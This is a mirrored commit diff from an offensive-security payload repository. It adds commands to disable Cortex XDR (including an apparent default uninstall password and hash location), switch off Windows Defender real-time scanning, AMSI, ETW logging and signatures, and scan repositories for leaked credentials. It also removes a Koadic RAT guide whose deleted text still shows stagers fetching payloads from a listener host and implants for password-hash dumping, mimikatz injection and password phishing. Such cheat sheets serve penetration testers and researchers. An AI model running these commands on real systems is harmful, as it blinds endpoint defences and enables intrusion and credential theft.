mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
TruffleHog examples + Cortex XDR disable
This commit is contained in:
parent
9d07e04de7
commit
b0d05faded
@ -25,6 +25,13 @@
|
|||||||
|
|
||||||
- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
|
- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
|
||||||
- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
|
- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
|
||||||
|
- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog)
|
||||||
|
```ps1
|
||||||
|
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys
|
||||||
|
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
|
||||||
|
trufflehog git https://github.com/trufflesecurity/trufflehog.git
|
||||||
|
trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
|
||||||
|
```
|
||||||
|
|
||||||
## Exploit
|
## Exploit
|
||||||
|
|
||||||
|
@ -64,6 +64,27 @@ PS> attrib +h mimikatz.exe
|
|||||||
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
|
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
|
||||||
Elastic Agent has been uninstalled.
|
Elastic Agent has been uninstalled.
|
||||||
```
|
```
|
||||||
|
* [Cortex XDR](https://mrd0x.com/cortex-xdr-analysis-and-bypass/)
|
||||||
|
```ps1
|
||||||
|
# Global uninstall password: Password1
|
||||||
|
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
|
||||||
|
Look for PasswordHash, PasswordSalt or password, salt strings.
|
||||||
|
|
||||||
|
# Disable Cortex: Change the DLL to a random value, then REBOOT
|
||||||
|
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f
|
||||||
|
|
||||||
|
# Disables the agent on startup (requires reboot to work)
|
||||||
|
cytool.exe startup disable
|
||||||
|
|
||||||
|
# Disables protection on Cortex XDR files, processes, registry and services
|
||||||
|
cytool.exe protect disable
|
||||||
|
|
||||||
|
# Disables Cortex XDR (Even with tamper protection enabled)
|
||||||
|
cytool.exe runtime disable
|
||||||
|
|
||||||
|
# Disables event collection
|
||||||
|
cytool.exe event_collection disable
|
||||||
|
```
|
||||||
|
|
||||||
### Disable Windows Defender
|
### Disable Windows Defender
|
||||||
|
|
||||||
@ -73,19 +94,30 @@ sc config WinDefend start= disabled
|
|||||||
sc stop WinDefend
|
sc stop WinDefend
|
||||||
Set-MpPreference -DisableRealtimeMonitoring $true
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
||||||
|
|
||||||
# Wipe currently stored definitions
|
|
||||||
# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
|
|
||||||
MpCmdRun.exe -RemoveDefinitions -All
|
|
||||||
|
|
||||||
## Exclude a process / location
|
## Exclude a process / location
|
||||||
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
||||||
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
|
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
|
||||||
Add-MpPreference -ExclusionPath C:\Video, C:\install
|
Add-MpPreference -ExclusionPath C:\Video, C:\install
|
||||||
|
|
||||||
|
# Disable scanning all downloaded files and attachments, disable AMSI (reactive)
|
||||||
|
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
|
||||||
|
PS C:\> Set-MpPreference -DisableIOAVProtection $true
|
||||||
|
# Disable AMSI (set to 0 to enable)
|
||||||
|
PS C:\> Set-MpPreference -DisableScriptScanning 1
|
||||||
|
|
||||||
# Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
|
# Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
|
||||||
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
|
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
|
||||||
|
|
||||||
|
# Wipe currently stored definitions
|
||||||
|
# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>
|
||||||
|
MpCmdRun.exe -RemoveDefinitions -All
|
||||||
|
|
||||||
|
# Remove signatures (if Internet connection is present, they will be downloaded again):
|
||||||
|
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
|
||||||
|
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Disable Windows Firewall
|
### Disable Windows Firewall
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -1,123 +0,0 @@
|
|||||||
# Koadic C3 COM Command & Control - JScript RAT
|
|
||||||
|
|
||||||
> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.
|
|
||||||
|
|
||||||
## Installation
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
git clone https://github.com/zerosum0x0/koadic
|
|
||||||
git submodule init
|
|
||||||
git submodule update
|
|
||||||
pip2.7 install -r requirements.txt --user
|
|
||||||
python2.7 koadic
|
|
||||||
```
|
|
||||||
|
|
||||||
## Set a listener
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
use stager/js/mshta
|
|
||||||
set LHOST 192.168.1.19
|
|
||||||
set SRVPORT 4444
|
|
||||||
run
|
|
||||||
|
|
||||||
[>] mshta http://192.168.1.19:4444/6DX7f
|
|
||||||
```
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
use stager/js/wmic
|
|
||||||
set LHOST 192.168.1.19
|
|
||||||
set SRVPORT 4444
|
|
||||||
run
|
|
||||||
|
|
||||||
[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl"
|
|
||||||
```
|
|
||||||
|
|
||||||
### Stagers
|
|
||||||
|
|
||||||
Stagers hook target zombies and allow you to use implants.
|
|
||||||
|
|
||||||
Module | Description
|
|
||||||
--------|------------
|
|
||||||
stager/js/mshta | serves payloads using MSHTA.exe HTML Applications
|
|
||||||
stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets
|
|
||||||
stager/js/wmic | serves payloads using WMIC XSL
|
|
||||||
stager/js/rundll32_js | serves payloads using rundll32.exe
|
|
||||||
stager/js/disk | serves payloads using files on disk
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## List zombies and interact with them
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
(koadic: sta/js/wmic)$ zombies
|
|
||||||
|
|
||||||
ID IP STATUS LAST SEEN
|
|
||||||
--- --------- ------- ------------
|
|
||||||
0 192.168.1.30 Alive 2018-10-04 17:07:12
|
|
||||||
|
|
||||||
(koadic: sta/js/wmic)$ zombies 0
|
|
||||||
ID: 0
|
|
||||||
Status: Alive
|
|
||||||
First Seen: 2018-10-04 17:05:00
|
|
||||||
Last Seen: 2018-10-04 17:14:42
|
|
||||||
IP: 192.168.1.30
|
|
||||||
User: DESKTOP-68URA9U\CrashWin
|
|
||||||
[...]
|
|
||||||
Elevated: No
|
|
||||||
[...]
|
|
||||||
```
|
|
||||||
|
|
||||||
Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami
|
|
||||||
[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.
|
|
||||||
[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.
|
|
||||||
Result for `cd C:\Users\CrashWin & whoami`:
|
|
||||||
desktop-68ura9u\crashwin
|
|
||||||
```
|
|
||||||
|
|
||||||
## Use an implant
|
|
||||||
|
|
||||||
Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
(koadic: sta/js/mshta)$ use implant/phish/password_box
|
|
||||||
(koadic: imp/phi/password_box)$ set ZOMBIE 1
|
|
||||||
(koadic: imp/phi/password_box)$ run
|
|
||||||
Input contents:
|
|
||||||
MyStrongPassword123!
|
|
||||||
```
|
|
||||||
|
|
||||||
### Implants
|
|
||||||
|
|
||||||
Implants start jobs on zombies.
|
|
||||||
|
|
||||||
Module | Description
|
|
||||||
--------|------------
|
|
||||||
implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
|
|
||||||
implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
|
|
||||||
implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window.
|
|
||||||
implant/fun/voice | Plays a message over text-to-speech.
|
|
||||||
implant/gather/clipboard | Retrieves the current content of the user clipboard.
|
|
||||||
implant/gather/enum_domain_info | Retrieve information about the Windows domain.
|
|
||||||
implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.
|
|
||||||
implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.
|
|
||||||
implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X).
|
|
||||||
implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
|
|
||||||
implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
|
|
||||||
implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed).
|
|
||||||
implant/manage/enable_rdesktop | Enables remote desktop on the target.
|
|
||||||
implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output.
|
|
||||||
implant/phishing/password_box | Prompt a user to enter their password.
|
|
||||||
implant/pivot/stage_wmi | Hook a zombie on another machine using WMI.
|
|
||||||
implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals.
|
|
||||||
implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN.
|
|
||||||
implant/utils/download_file | Downloads a file from the target zombie.
|
|
||||||
implant/utils/multi_module | Run a number of implants in succession.
|
|
||||||
implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
|
|
||||||
|
|
||||||
## References
|
|
||||||
|
|
||||||
- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
|
|
||||||
- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
|
|
@ -223,6 +223,12 @@ List:
|
|||||||
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass using unicode
|
||||||
|
|
||||||
|
In some languages (.NET, Python 3) regex supports unicode by default.
|
||||||
|
`\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`.
|
||||||
|
|
||||||
|
|
||||||
### Bypass filter_var() php function
|
### Bypass filter_var() php function
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
Loading…
Reference in New Issue
Block a user